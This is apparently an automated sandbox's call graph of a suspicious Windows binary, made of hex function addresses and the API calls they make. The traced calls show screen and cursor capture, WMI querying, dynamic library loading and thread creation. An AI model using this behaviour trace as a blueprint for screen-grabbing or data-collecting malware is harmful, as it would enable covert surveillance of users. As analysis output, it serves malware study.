13060->13061 13062 996b42 13061->13062 13063 99109a 2 API calls 13062->13063 13064 996b4a 13063->13064 13065 99b83a 5 API calls 13064->13065 13066 996b55 13065->13066 13067 998d9a 2 API calls 13066->13067 13068 996b64 13067->13068 13069 99109a 2 API calls 13068->13069 13070 996b70 13069->13070 13071 99b83a 5 API calls 13070->13071 13072 996b7b 13071->13072 13073 998d9a 2 API calls 13072->13073 13074 996b8a 13073->13074 13075 996bdc 13074->13075 13077 99109a 2 API calls 13074->13077 13076 99109a 2 API calls 13075->13076 13079 996bec 13076->13079 13078 996ba3 13077->13078 13080 999fe4 2 API calls 13078->13080 13081 99b83a 5 API calls 13079->13081 13082 996bc5 13080->13082 13083 996bf7 13081->13083 13084 998d9a 2 API calls 13082->13084 13085 998d9a 2 API calls 13083->13085 13086 996bce 13084->13086 13087 996c06 13085->13087 13088 99b83a 5 API calls 13086->13088 13089 99109a 2 API calls 13087->13089 13088->13075 13090 996c12 13089->13090 13091 99b83a 5 API calls 13090->13091 13092 996c1d 13091->13092 13093 998d9a 2 API calls 13092->13093 13094 996c2c 13093->13094 13095 99109a 2 API calls 13094->13095 13096 996c34 13095->13096 13097 99b83a 5 API calls 13096->13097 13098 996c3f 13097->13098 13099 998d9a 2 API calls 13098->13099 13100 996c4e 13099->13100 13101 99109a 2 API calls 13100->13101 13102 996c5a 13101->13102 13103 99b83a 5 API calls 13102->13103 13127->12994 13176 999f85 2 API calls 13175->13176 13177 99b314 13176->13177 13178 998d9a 2 API calls 13177->13178 13179 99138d 13178->13179 13180 99b3f2 13179->13180 13181 99aab0 4 API calls 13180->13181 13182 99b404 13181->13182 13183 99a1f8 GetSystemTimeAsFileTime 13182->13183 13184 991399 13183->13184 13185 997d0f 13184->13185 13721 9a0522 13185->13721 13187 997d2f 13724 998146 13187->13724 13895 999905 13202->13895 13205 9a0522 GetTickCount 13206 997aee 13205->13206 13901 997f12 13206->13901 13208 997b0e 13209 9976f8 19 API calls 13208->13209 13218 991420 13208->13218 13210 997b3e 13209->13210 13214 997692 8 API calls 13210->13214 13230 997b45 13210->13230 13211 998ddf 2 API calls 13212 997c47 13211->13212 13213 998ddf 2 API calls 13212->13213 13215 997c52 13213->13215 13217 997b6f 13214->13217 13216 998ddf 2 API calls 13215->13216 13216->13218 13217->13230 13940 99793f 13217->13940 13218->12987 13218->12988 13220 997b9a 13220->13230 13953 99780f 13220->13953 13223 99110a 8 API calls 13224 997bda 13223->13224 13225 997be6 13224->13225 13226 998f63 memset 13224->13226 13967 9977be 13225->13967 13227 997bfb 13226->13227 13229 991d97 6 API calls 13227->13229 13229->13225 13230->13211 13232 991120 13231->13232 13233 99a06e memset 13232->13233 13234 991174 13232->13234 13235 991146 13233->13235 13234->12995 13236 99a1f8 GetSystemTimeAsFileTime 13235->13236 13237 99115b 13236->13237 13238 99ac24 6 API calls 13237->13238 13239 991169 13238->13239 13240 99abf8 6 API calls 13239->13240 13240->13234 13242 9910da 13241->13242 13243 9910c6 13241->13243 13244 99aaff 4 API calls 13242->13244 13245 99aaff 4 API calls 13243->13245 13246 9910cd 13244->13246 13245->13246 13247 999fa5 2 API calls 13246->13247 13248 9910fd 13247->13248 13248->12984 13289 9a11b3 13249->13289 13251 997ebe 13293 998927 13251->13293 13253 997ed1 13254 998927 strncpy 13253->13254 13255 997ee5 13254->13255 13256 998927 strncpy 13255->13256 13257 997ef9 13256->13257 13297 9a1c34 13257->13297 13259 997f01 13259->13012 13389 9975e1 13260->13389 13264 997732 13265 997767 13264->13265 13403 9974fe 13264->13403 13267 998ddf 2 API calls 13265->13267 13268 99777f 13267->13268 13269 998ddf 2 API calls 13268->13269 13270 99778a 13269->13270 13272 998ddf 2 API calls 13270->13272 13271 997740 13271->13265 13411 99faaf 13271->13411 13273 997795 13272->13273 13275 99779f 13273->13275 13276 998ddf 2 API calls 13273->13276 13275->13014 13276->13275 13278 99bfc8 2 API calls 13277->13278 13279 9976aa 13278->13279 13280 99755a 5 API calls 13279->13280 13285 9976e6 13279->13285 13281 9976c9 13280->13281 13282 9a0485 lstrlenW 13281->13282 13283 9976dd 13282->13283 13284 998ecb lstrlenW 13283->13284 13284->13285 13286 9978c5 13285->13286 13480 9a1d21 13286->13480 13288 9978de 13288->13023 13290 9a11bb 13289->13290 13292 9a11c2 13290->13292 13302 9a28ef 13290->13302 13292->13251 13294 998938 13293->13294 13295 99893d 13293->13295 13294->13253 13320 9a1293 13295->13320 13298 9a1c43 13297->13298 13299 9a1c48 13298->13299 13332 9a1bd8 13298->13332 13299->13259 13301 9a1c61 13301->13259 13303 9a28fe 13302->13303 13304 9a2931 13302->13304 13305 9a290f 13303->13305 13306 9a2922 SwitchToThread 13303->13306 13304->13292 13307 9a2918 13305->13307 13309 9a28c9 13305->13309 13306->13304 13306->13306 13307->13292 13314 9a2951 GetModuleHandleW 13309->13314 13311 9a28d6 13313 9a28e4 13311->13313 13319 9a2933 _time64 GetCurrentProcessId 13311->13319 13313->13307 13315 9a296f GetProcAddress 13314->13315 13318 9a29a0 13314->13318 13316 9a2983 GetProcAddress 13315->13316 13315->13318 13317 9a2992 GetProcAddress 13316->13317 13316->13318 13317->13318 13318->13311 13319->13313 13321 9a12c5 13320->13321 13322 9a129e 13320->13322 13321->13294 13322->13321 13324 9a12d9 13322->13324 13325 9a12e4 13324->13325 13326 9a1307 13324->13326 13325->13326 13328 9a2edb 13325->13328 13326->13321 13330 9a2ef3 13328->13330 13329 9a2f46 13329->13326 13330->13329 13331 9a2f7a strncpy 13330->13331 13331->13329 13333 9a1beb 13332->13333 13335 9a1c07 13333->13335 13336 9a14c5 13333->13336 13335->13301 13337 9a14f3 13336->13337 13354 9a1505 13336->13354 13338 9a152f 13337->13338 13339 9a155f 13337->13339 13340 9a16c3 13337->13340 13341 9a15b0 13337->13341 13345 9a158f 13337->13345 13337->13354 13344 9a1535 _snprintf 13338->13344 13360 9a33da 13339->13360 13343 9a1c8e 2 API calls 13340->13343 13377 9a1c8e _snprintf 13341->13377 13348 9a16f2 13343->13348 13344->13354 13372 9a1a0a 13345->13372 13351 9a1774 13348->13351 13348->13354 13357 9a18aa 13348->13357 13349 9a15bf 13350 9a14c5 11 API calls 13349->13350 13349->13354 13350->13349 13353 9a17b5 qsort 13351->13353 13351->13354 13352 9a1a0a 2 API calls 13352->13357 13353->13354 13359 9a17de 13353->13359 13354->13335 13355 9a14c5 11 API calls 13355->13357 13356 9a1a0a 2 API calls 13356->13359 13357->13352 13357->13354 13357->13355 13358 9a14c5 11 API calls 13358->13359 13359->13354 13359->13356 13359->13358 13361 9a33e7 _snprintf 13360->13361 13362 9a33e4 13360->13362 13363 9a3410 13361->13363 13371 9a3487 13361->13371 13362->13361 13363->13371 13382 9a33b3 localeconv 13363->13382 13366 9a342a strchr 13367 9a344e strchr 13366->13367 13368 9a3438 13366->13368 13369 9a3461 13367->13369 13367->13371 13368->13367 13368->13371 13369->13371 13385 998ecb 13369->13385 13371->13354 13373 9a1a20 13372->13373 13374 9a1ba8 13373->13374 13375 9a1b3a _snprintf 13373->13375 13376 9a1b23 _snprintf 13373->13376 13374->13354 13375->13373 13376->13373 13379 9a1caf 13377->13379 13378 9a1cb6 13378->13349 13379->13378 13380 9a2edb strncpy 13379->13380 13381 9a1ccc 13380->13381 13381->13349 13383 9a33d5 strchr 13382->13383 13384 9a33c3 strchr 13382->13384 13383->13366 13383->13367 13384->13383 13386 998ef7 lstrlenW 13385->13386 13388 998f2b 13386->13388 13388->13371 13388->13388 13415 998dc9 RtlAllocateHeap 13389->13415 13391 9975fb 13392 99767c 13391->13392 13393 9a357b 2 API calls 13391->13393 13392->13275 13400 99bf56 13392->13400 13394 99761f 13393->13394 13416 99755a 13394->13416 13396 997634 13397 9a0485 lstrlenW 13396->13397 13398 997667 13397->13398 13399 998f63 memset 13398->13399 13399->13392 13425 998dc9 RtlAllocateHeap 13400->13425 13402 99bf7b 13402->13264 13404 99750f 13403->13404 13405 9998d0 2 API calls 13404->13405 13406 99752b 13405->13406 13426 998dc9 RtlAllocateHeap 13406->13426 13408 997536 13409 997550 13408->13409 13410 999fa5 2 API calls 13408->13410 13409->13271 13410->13409 13414 99fac3 13411->13414 13413 99fb09 13413->13265 13414->13413 13427 99fb10 13414->13427 13415->13391 13417 997573 13416->13417 13418 991080 2 API calls 13417->13418 13419 997580 lstrcpynA 13418->13419 13420 99759e 13419->13420 13421 998d87 2 API calls 13420->13421 13422 9975a8 13421->13422 13423 998f63 memset 13422->13423 13424 9975cd 13423->13424 13424->13396 13425->13402 13426->13408 13432 99f7a3 memset memset 13427->13432 13429 99fb3c 13431 99fb5f 13429->13431 13458 99f5a1 13429->13458 13431->13414 13433 999f6b 2 API calls 13432->13433 13434 99f7f5 13433->13434 13435 999f6b 2 API calls 13434->13435 13436 99f802 13435->13436 13437 999f6b 2 API calls 13436->13437 13438 99f80f 13437->13438 13439 999f6b 2 API calls 13438->13439 13440 99f81c 13439->13440 13441 999f6b 2 API calls 13440->13441 13442 99f829 13441->13442 13443 998f63 memset 13442->13443 13456 99f83d 13443->13456 13444 99f8ba GetLastError 13444->13456 13445 99fa0d 13446 998f63 memset 13445->13446 13452 99f887 13445->13452 13449 99fa2f 13446->13449 13447 99a1f8 GetSystemTimeAsFileTime 13447->13456 13448 99f8fb GetLastError 13448->13456 13450 99fa4b GetLastError 13449->13450 13449->13452 13450->13452 13451 99f953 GetLastError 13451->13456 13452->13429 13453 999f6b 2 API calls 13453->13456 13455 998d87 2 API calls 13455->13456 13456->13444 13456->13445 13456->13447 13456->13448 13456->13451 13456->13452 13456->13453 13456->13455 13457 99f9cd GetLastError 13456->13457 13474 99f6e9 13456->13474 13457->13456 13459 99f5be 13458->13459 13478 998dc9 RtlAllocateHeap 13459->13478 13461 99f5d3 13462 99f5dc 13461->13462 13479 998dc9 RtlAllocateHeap 13461->13479 13464 99f6af 13462->13464 13465 998ddf 2 API calls 13462->13465 13466 99f6c7 13464->13466 13467 998ddf 2 API calls 13464->13467 13465->13464 13466->13431 13467->13466 13468 99f689 GetLastError 13468->13462 13469 99f695 13468->13469 13470 99a1f8 GetSystemTimeAsFileTime 13469->13470 13470->13462 13471 99a1f8 GetSystemTimeAsFileTime 13472 99f5ec 13471->13472 13472->13462 13472->13464 13472->13468 13472->13471 13473 998e5d 3 API calls 13472->13473 13473->13472 13475 99f70b 13474->13475 13476 99f730 GetLastError 13475->13476 13477 99f72b 13475->13477 13476->13477 13477->13456 13478->13461 13479->13472 13481 9a1d74 13480->13481 13482 9a1d2e 13480->13482 13481->13288 13482->13481 13485 9a246c 13482->13485 13484 9a1d61 13484->13288 13492 9a1e6f 13485->13492 13487 9a2483 13490 9a24aa 13487->13490 13496 9a25e0 13487->13496 13489 9a24a1 13489->13490 13491 9a1e6f 8 API calls 13489->13491 13490->13484 13491->13490 13493 9a1e81 13492->13493 13495 9a1eba 13493->13495 13506 9a200e 13493->13506 13495->13487 13497 9a25f7 13496->13497 13500 9a2641 13496->13500 13498 9a2613 13497->13498 13499 9a2667 13497->13499 13497->13500 13502 9a2656 13498->13502 13504 9a2618 13498->13504 13532 9a23ec 13499->13532 13500->13489 13522 9a24dd 13502->13522 13504->13500 13505 9a2629 memchr 13504->13505 13505->13500 13507 9a2028 13506->13507 13508 9a20e2 13507->13508 13509 9a2097 13507->13509 13512 9a204d 13507->13512 13508->13512 13513 9a349a 13508->13513 13511 9a20a7 _errno _strtoi64 _errno 13509->13511 13511->13512 13512->13495 13519 9a34fe localeconv 13513->13519 13516 9a34d2 13517 9a34e1 _errno 13516->13517 13518 9a34ed 13516->13518 13517->13518 13518->13512 13520 9a350e strchr 13519->13520 13521 9a34a9 _errno strtod 13519->13521 13520->13521 13521->13516 13521->13517 13523 9a11b3 7 API calls 13522->13523 13524 9a24e9 13523->13524 13525 9a1e6f 8 API calls 13524->13525 13531 9a250b 13524->13531 13529 9a24ff 13525->13529 13526 9a2528 memchr 13526->13529 13526->13531 13527 9a25e0 17 API calls 13527->13529 13528 9a12d9 strncpy 13528->13529 13529->13526 13529->13527 13529->13528 13530 9a1e6f 8 API calls 13529->13530 13529->13531 13530->13529 13531->13500 13533 9a23f5 13532->13533 13534 9a1e6f 8 API calls 13533->13534 13535 9a2410 13533->13535 13537 9a2408 13534->13537 13535->13500 13536 9a25e0 18 API calls 13536->13537 13537->13535 13537->13536 13538 9a1e6f 8 API calls 13537->13538 13538->13537 13539->13026 13541 999fa5 2 API calls 13540->13541 13542 9969c7 13541->13542 13543 99e795 13542->13543 13544 999f85 2 API calls 13543->13544 13545 99e7aa 13544->13545 13692 99e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 13545->13692 13548 998d9a 2 API calls 13549 99e7c2 13548->13549 13550 9969cc 13549->13550 13551 999f85 2 API calls 13549->13551 13550->13033 13552 99e7d6 13551->13552 13553 999f85 2 API calls 13552->13553 13554 99e7e7 13553->13554 13699 99e6d9 SysAllocString SysAllocString 13554->13699 13556 99e7f8 13557 99e826 13556->13557 13559 999ab3 RtlAllocateHeap 13556->13559 13558 998d9a 2 API calls 13557->13558 13560 99e82f 13558->13560 13561 99e807 VariantClear 13559->13561 13562 998d9a 2 API calls 13560->13562 13561->13557 13564 99e838 13562->13564 13705 99e539 13564->13705 13567 999f85 2 API calls 13566->13567 13568 99e85b 13567->13568 13569 99e485 6 API calls 13568->13569 13570 99e865 13569->13570 13571 998d9a 2 API calls 13570->13571 13572 99e873 13571->13572 13573 999f85 2 API calls 13572->13573 13588 996a80 13572->13588 13574 99e887 13573->13574 13575 999f85 2 API calls 13574->13575 13576 99e898 13575->13576 13577 99e6d9 10 API calls 13576->13577 13578 99e8a9 13577->13578 13579 99e8d7 13578->13579 13580 999ab3 RtlAllocateHeap 13578->13580 13581 998d9a 2 API calls 13579->13581 13582 99e8b8 VariantClear 13580->13582 13583 99e8e0 13581->13583 13582->13579 13584 998d9a 2 API calls 13583->13584 13586 99e8e9 13584->13586 13587 99e539 2 API calls 13586->13587 13587->13588 13589 99e8fa 13588->13589 13590 999f85 2 API calls 13589->13590 13591 99e90f 13590->13591 13592 99e485 6 API calls 13591->13592 13593 99e919 13592->13593 13594 998d9a 2 API calls 13593->13594 13595 99e927 13594->13595 13596 999f85 2 API calls 13595->13596 13611 996a88 13595->13611 13597 99e93b 13596->13597 13598 999f85 2 API calls 13597->13598 13599 99e94c 13598->13599 13600 99e6d9 10 API calls 13599->13600 13601 99e95d 13600->13601 13602 99e98b 13601->13602 13604 999ab3 RtlAllocateHeap 13601->13604 13603 998d9a 2 API calls 13602->13603 13605 99e994 13603->13605 13607 99e96c VariantClear 13604->13607 13608 998d9a 2 API calls 13605->13608 13607->13602 13609 99e99d 13608->13609 13610 99e539 2 API calls 13609->13610 13610->13611 13612 998dc9 RtlAllocateHeap 13611->13612 13612->13046 13613->13049 13615 99bbb1 13614->13615 13616 998f63 memset 13615->13616 13617 99bbcf 13615->13617 13616->13617 13617->13047 13619 998f63 memset 13618->13619 13620 99b87e 13619->13620 13621 998f63 memset 13620->13621 13622 99b88a 13621->13622 13623 99b9e2 13622->13623 13626 996b0d 13622->13626 13710 998dc9 RtlAllocateHeap 13622->13710 13625 998ddf 2 API calls 13623->13625 13625->13626 13626->13055 13627 999bfd 2 API calls 13629 99b8f9 13627->13629 13628 999a76 RtlAllocateHeap 13628->13629 13629->13623 13629->13626 13629->13627 13629->13628 13630 998ddf 2 API calls 13629->13630 13631 99b9a8 13629->13631 13630->13629 13631->13623 13632 999b26 2 API calls 13631->13632 13633 99b9cb 13632->13633 13633->13623 13634 99b9d1 13633->13634 13635 998ddf 2 API calls 13634->13635 13635->13626 13693 99e4ca SysAllocString 13692->13693 13698 99e507 13692->13698 13694 99e4e5 13693->13694 13695 99e4e9 CoSetProxyBlanket 13694->13695 13694->13698 13696 99e500 13695->13696 13695->13698 13709 998dc9 RtlAllocateHeap 13696->13709 13698->13548 13700 999f85 2 API calls 13699->13700 13701 99e704 SysAllocString 13700->13701 13702 998d9a 2 API calls 13701->13702 13704 99e717 SysFreeString SysFreeString SysFreeString 13702->13704 13704->13556 13706 99e544 13705->13706 13707 998ddf 2 API calls 13706->13707 13708 99e561 13707->13708 13708->13550 13709->13698 13710->13629 13722 9a0542 GetTickCount 13721->13722 13723 9a0531 __aulldiv 13721->13723 13722->13187 13723->13187 13725 9a11b3 7 API calls 13724->13725 13726 998156 13725->13726 13727 998927 strncpy 13726->13727 13728 99816f 13727->13728 13729 998927 strncpy 13728->13729 13730 998183 13729->13730 13731 998927 strncpy 13730->13731 13732 998194 13731->13732 13733 998927 strncpy 13732->13733 13734 9981a7 13733->13734 13735 998927 strncpy 13734->13735 13736 9981bd 13735->13736 13737 998927 strncpy 13736->13737 13738 9981d1 13737->13738 13739 998927 strncpy 13738->13739 13740 9981ea 13739->13740 13741 998927 strncpy 13740->13741 13742 9981fe 13741->13742 13743 998927 strncpy 13742->13743 13744 998212 13743->13744 13745 998927 strncpy 13744->13745 13746 998226 13745->13746 13747 998927 strncpy 13746->13747 13748 99823c 13747->13748 13749 998927 strncpy 13748->13749 13750 998253 13749->13750 13880 998983 13750->13880 13753 998927 strncpy 13754 998266 13753->13754 13755 998927 strncpy 13754->13755 13756 99827a 13755->13756 13757 998927 strncpy 13756->13757 13758 99828e 13757->13758 13759 998983 5 API calls 13758->13759 13760 998296 13759->13760 13761 998927 strncpy 13760->13761 13762 9982a1 13761->13762 13763 998983 5 API calls 13762->13763 13764 9982a9 13763->13764 13765 998927 strncpy 13764->13765 13766 9982b4 13765->13766 13767 998983 5 API calls 13766->13767 13768 9982bc 13767->13768 13769 998927 strncpy 13768->13769 13770 9982c7 13769->13770 13771 998927 strncpy 13770->13771 13772 9982db 13771->13772 13773 998983 5 API calls 13772->13773 13774 9982e3 13773->13774 13775 998927 strncpy 13774->13775 13776 9982ee 13775->13776 13777 998927 strncpy 13776->13777 13778 998308 13777->13778 13779 998983 5 API calls 13778->13779 13780 998310 13779->13780 13781 998927 strncpy 13780->13781 13782 99831b 13781->13782 13783 998927 strncpy 13782->13783 13784 99832f 13783->13784 13785 998927 strncpy 13784->13785 13786 998343 13785->13786 13787 998983 5 API calls 13786->13787 13788 998357 13787->13788 13789 998927 strncpy 13788->13789 13790 998362 13789->13790 13791 998927 strncpy 13790->13791 13792 998376 13791->13792 13793 998927 strncpy 13792->13793 13794 99838a 13793->13794 13795 998983 5 API calls 13794->13795 13796 998395 13795->13796 13797 998927 strncpy 13796->13797 13798 9983a0 13797->13798 13799 998983 5 API calls 13798->13799 13885 999b62 13880->13885 13882 998996 13883 99825b 13882->13883 13884 998ddf 2 API calls 13882->13884 13883->13753 13884->13883 13886 999b71 WideCharToMultiByte 13885->13886 13893 999bc1 13885->13893 13887 999b8c 13886->13887 13886->13893 13894 998dc9 RtlAllocateHeap 13887->13894 13889 999b95 13890 999b9d WideCharToMultiByte 13889->13890 13889->13893 13891 999bb6 13890->13891 13890->13893 13892 998ddf 2 API calls 13891->13892 13892->13893 13893->13882 13894->13889 13896 999913 13895->13896 13897 9a36d5 2 API calls 13896->13897 13898 99995d 13897->13898 13899 997ae9 13898->13899 13900 9a36d5 2 API calls 13898->13900 13899->13205 13900->13898 13902 9a11b3 7 API calls 13901->13902 13903 997f21 13902->13903 13904 998927 strncpy 13903->13904 13905 997f37 13904->13905 13906 998927 strncpy 13905->13906 13907 997f4c 13906->13907 13908 998927 strncpy 13907->13908 13909 997f60 13908->13909 13910 998927 strncpy 13909->13910 13911 997f75 13910->13911 13912 998927 strncpy 13911->13912 13913 997f86 13912->13913 13914 998927 strncpy 13913->13914 13915 997f9f 13914->13915 13916 998927 strncpy 13915->13916 13917 997fb5 13916->13917 13918 998927 strncpy 13917->13918 13919 997fc6 13918->13919 13920 998927 strncpy 13919->13920 13921 997fda 13920->13921 13922 998927 strncpy 13921->13922 13923 997fed 13922->13923 13924 998927 strncpy 13923->13924 13925 998001 13924->13925 13926 998927 strncpy 13925->13926 13927 998020 13926->13927 13928 998983 5 API calls 13927->13928 13929 998031 13928->13929 13930 998927 strncpy 13929->13930 13931 99803c 13930->13931 13932 998983 5 API calls 13931->13932 13933 99804d 13932->13933 13934 998927 strncpy 13933->13934 13935 998058 13934->13935 13936 998927 strncpy 13935->13936 13937 998074 13936->13937 13938 9a1c34 13 API calls 13937->13938 13939 99807c 13938->13939 13939->13208 13941 9a1d21 18 API calls 13940->13941 13942 99795d 13941->13942 13946 997969 13942->13946 13974 99a06e 13942->13974 13944 99799d 13944->13946 13978 998dc9 RtlAllocateHeap 13944->13978 13946->13220 13947 997a75 13949 998ddf 2 API calls 13947->13949 13951 997a86 13947->13951 13948 997a21 13948->13946 13948->13947 13950 999a76 RtlAllocateHeap 13948->13950 13949->13947 13950->13948 13952 998ddf 2 API calls 13951->13952 13952->13946 13954 997826 13953->13954 13955 99bfc8 2 API calls 13954->13955 13963 9978b6 13954->13963 13956 997842 13955->13956 13956->13963 13966 99788e 13956->13966 13979 998dc9 RtlAllocateHeap 13956->13979 13958 99785f 13962 999fa5 2 API calls 13958->13962 13958->13966 13959 998ddf 2 API calls 13960 9978ac 13959->13960 13961 998ddf 2 API calls 13960->13961 13961->13963 13964 99787e 13962->13964 13963->13223 13963->13230 13980 998bbb 13964->13980 13966->13959 13996 99808f 13967->13996 13969 9977db 13970 9976f8 19 API calls 13969->13970 13971 9977fb 13970->13971 13972 998ddf 2 API calls 13971->13972 13973 997806 13972->13973 13973->13230 13975 99a07a 13974->13975 13976 99a09f 13975->13976 13977 99a093 memset 13975->13977 13976->13944 13977->13976 13978->13948 13979->13958 13983 998a4f 13980->13983 13990 9989b9 13983->13990 13986 998aa8 GetLastError 13989 998b37 13986->13989 13987 998ddf 2 API calls 13988 998a7c 13987->13988 13988->13966 13989->13987 13995 998dc9 RtlAllocateHeap 13990->13995 13992 998a2c 13992->13986 13992->13988 13992->13989 13993 998a1b lstrlenW 13993->13992 13994 9989ca 13994->13992 13994->13993 13995->13994 13997 9a11b3 7 API calls 13996->13997 13998 99809e 13997->13998 13999 998927 strncpy 13998->13999 14000 9980b4 13999->14000 14001 998927 strncpy 14000->14001 14002 9980c8 14001->14002 14003 998927 strncpy 14002->14003 14004 9980d9 14003->14004 14005 998927 strncpy 14004->14005 14006 9980ea 14005->14006 14007 998927 strncpy 14006->14007 14008 9980ff 14007->14008 14009 998927 strncpy 14008->14009 14010 998115 14009->14010 14011 998927 strncpy 14010->14011 14012 99812b 14011->14012 14013 9a1c34 13 API calls 14012->14013 14014 998133 14013->14014 14014->13969 14015 995f94 14021 998dc9 RtlAllocateHeap 14015->14021 14017 996012 14019 99a1f8 GetSystemTimeAsFileTime 14020 995fa9 14019->14020 14020->14017 14020->14019 14022 995d1e GetDC 14020->14022 14021->14020 14023 995d50 CreateCompatibleDC 14022->14023 14047 995f3e 14022->14047 14024 995d61 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 14023->14024 14023->14047 14026 995d8c SelectObject 14024->14026 14024->14047 14025 998ddf 2 API calls 14027 995f5d 14025->14027 14028 995d9f BitBlt GetCursorInfo 14026->14028 14026->14047 14029 998ddf 2 API calls 14027->14029 14030 995dd0 14028->14030 14031 995e25 SelectObject 14028->14031 14032 995f68 14029->14032 14030->14031 14033 995dd5 CopyIcon GetIconInfo GetObjectW DrawIconEx 14030->14033 14034 995e39 GetObjectW 14031->14034 14031->14047 14035 995f6f DeleteDC 14032->14035 14036 995f76 14032->14036 14033->14031 14048 998dc9 RtlAllocateHeap 14034->14048 14035->14036 14037 995f7a DeleteDC 14036->14037 14038 995f81 14036->14038 14037->14038 14040 995f8c 14038->14040 14041 995f85 DeleteObject 14038->14041 14040->14020 14041->14040 14042 995ea2 14043 995eae GetDIBits 14042->14043 14042->14047 14049 998dc9 RtlAllocateHeap 14043->14049 14045 995ed4 14045->14047 14050 99fbfb 14045->14050 14047->14025 14048->14042 14049->14045 14060 998dc9 RtlAllocateHeap 14050->14060 14052 99fc1b 14059 99fcb3 14052->14059 14061 9a5800 14052->14061 14054 998ddf 2 API calls 14055 99fcd1 14054->14055 14055->14047 14057 998e5d 3 API calls 14058 99fc46 14057->14058 14058->14057 14058->14059 14064 9a4c20 14058->14064 14059->14054 14060->14052 14101 9a55c0 14061->14101 14063 9a581c 14063->14058 14065 9a4c31 14064->14065 14066 9a4cda 14065->14066 14075 9a4c8e 14065->14075 14112 9a5ee0 14065->14112 14066->14058 14068 9a518d 14068->14066 14076 9a524f 14068->14076 14088 9a5ee0 memcpy 14068->14088 14069 9a4f79 memcpy 14071 9a4fa6 14069->14071 14070 9a4eb8 14070->14066 14070->14069 14070->14071 14072 9a4f01 memcpy 14070->14072 14074 9a5ee0 memcpy 14070->14074 14071->14066 14071->14068 14083 9a5ee0 memcpy 14071->14083 14072->14070 14073 9a4cf8 14073->14066 14073->14070 14078 9a5ee0 memcpy 14073->14078 14074->14070 14075->14066 14075->14073 14084 9a5ee0 memcpy 14075->14084 14085 9a5ee0 memcpy 14076->14085 14086 9a52a1 14076->14086 14087 9a52ea 14076->14087 14077 9a5ee0 memcpy 14077->14087 14078->14070 14079 9a532b 14082 9a5336 14079->14082 14090 9a533d 14079->14090 14080 9a5324 14116 9a4160 14080->14116 14138 9a5970 14082->14138 14083->14071 14084->14073 14085->14086 14086->14066 14086->14077 14087->14066 14087->14079 14087->14080 14092 9a53f3 14087->14092 14088->14068 14095 9a5329 14090->14095 14154 9a5ad0 14090->14154 14092->14066 14093 9a5ee0 memcpy 14092->14093 14094 9a54c4 14093->14094 14094->14058 14095->14066 14095->14092 14100 9a5387 14095->14100 14170 9a7180 14095->14170 14097 9a5ee0 memcpy 14097->14092 14098 9a53a3 14099 9a53ab memset 14098->14099 14098->14100 14099->14100 14100->14097 14102 9a57bd 14101->14102 14103 9a55d5 14101->14103 14102->14063 14103->14102 14106 9a5830 14103->14106 14107 9a583e 14106->14107 14108 9a57b3 14107->14108 14110 9a5f30 memset 14107->14110 14108->14063 14111 9a8994 14110->14111 14111->14108 14113 9a5ef2 14112->14113 14114 9a5f03 memcpy 14113->14114 14115 9a5f23 14113->14115 14114->14115 14115->14075 14126 9a4190 14116->14126 14117 9a42b9 14118 9a42f9 14117->14118 14119 9a42d1 memcpy 14117->14119 14124 9a4353 14117->14124 14120 9a4330 memcpy 14118->14120 14121 9a4305 memcpy 14118->14121 14119->14124 14120->14124 14121->14120 14122 9a4329 14121->14122 14122->14120 14123 9a7180 memcpy 14123->14126 14125 9a4384 14124->14125 14128 9a4407 14124->14128 14129 9a43e1 memcpy 14124->14129 14125->14095 14126->14117 14126->14123 14127 9a5ee0 memcpy 14126->14127 14131 9a4258 memcpy 14126->14131 14173 9a6020 14126->14173 14127->14126 14130 9a6020 memcpy 14128->14130 14134 9a4444 14128->14134 14129->14128 14130->14134 14131->14126 14133 9a44e2 14133->14095 14134->14133 14135 9a7180 memcpy 14134->14135 14136 9a44d5 14135->14136 14137 9a5ee0 memcpy 14136->14137 14137->14133 14142 9a5978 14138->14142 14140 9a5a29 14143 9a5a3f 14140->14143 14146 9a5a7f 14140->14146 14153 9a5a23 14140->14153 14142->14140 14144 9a5ee0 memcpy 14142->14144 14142->14153 14177 9a5d50 14142->14177 14186 9a6ef0 14142->14186 14145 9a6ef0 memcpy 14143->14145 14144->14142 14147 9a5a5e 14145->14147 14148 9a6ef0 memcpy 14146->14148 14146->14153 14149 9a5ee0 memcpy 14147->14149 14150 9a5aa7 14148->14150 14151 9a5a6b 14149->14151 14152 9a5ee0 memcpy 14150->14152 14151->14095 14152->14153 14153->14095 14156 9a5ad9 14154->14156 14155 9a5d50 4 API calls 14155->14156 14156->14155 14157 9a5ca4 14156->14157 14158 9a5cab 14156->14158 14160 9a6ef0 memcpy 14156->14160 14163 9a5ee0 memcpy 14156->14163 14157->14095 14159 9a5cba 14158->14159 14161 9a5cfb 14158->14161 14162 9a6ef0 memcpy 14159->14162 14160->14156 14161->14157 14164 9a6ef0 memcpy 14161->14164 14165 9a5cd9 14162->14165 14163->14156 14166 9a5d23 14164->14166 14167 9a5ee0 memcpy 14165->14167 14169 9a5ee0 memcpy 14166->14169 14168 9a5ce6 14167->14168 14168->14095 14169->14157 14171 9a719a 14170->14171 14172 9a720b memcpy 14171->14172 14172->14098 14174 9a6038 14173->14174 14175 9a603e memcpy 14173->14175 14174->14126 14176 9a605e 14175->14176 14176->14126 14184 9a5d62 14177->14184 14178 9a5d7c memcpy 14178->14184 14179 9a5e67 14180 9a5ed9 14179->14180 14182 9a5ea9 14179->14182 14183 9a5e7e memset 14179->14183 14180->14142 14181 9a6020 memcpy 14181->14184 14182->14180 14185 9a5eb3 memset 14182->14185 14183->14142 14184->14178 14184->14179 14184->14181 14185->14180 14187 9a6f0a 14186->14187 14188 9a7180 memcpy 14187->14188 14189 9a6f8a 14187->14189 14188->14189 14189->14142 11205 996603 11206 996669 11205->11206 11207 996611 11205->11207 11234 998db4 HeapCreate 11207->11234 11209 996616 11235 999787 11209->11235 11218 99666e 11255 998d9a 11218->11255 11219 996664 11220 998d9a 2 API calls 11219->11220 11220->11206 11227 9966c5 CreateThread 11227->11206 11335 9963a2 11227->11335 11228 99f0d9 8 API calls 11229 9966a0 11228->11229 11268 99647a memset 11229->11268 11234->11209 11287 998dc9 RtlAllocateHeap 11235->11287 11237 99661b 11238 9a3d36 11237->11238 11239 9a3d6b 11238->11239 11288 998e2e 11239->11288 11241 996629 11242 99f0d9 11241->11242 11292 999f6b 11242->11292 11245 99f0fb GetModuleHandleA 11247 99f10a 11245->11247 11246 99f103 LoadLibraryA 11246->11247 11250 99f118 11247->11250 11295 99f08e 11247->11295 11300 998d87 11250->11300 11252 999f85 11318 998ca3 11252->11318 11254 996650 GetFileAttributesW 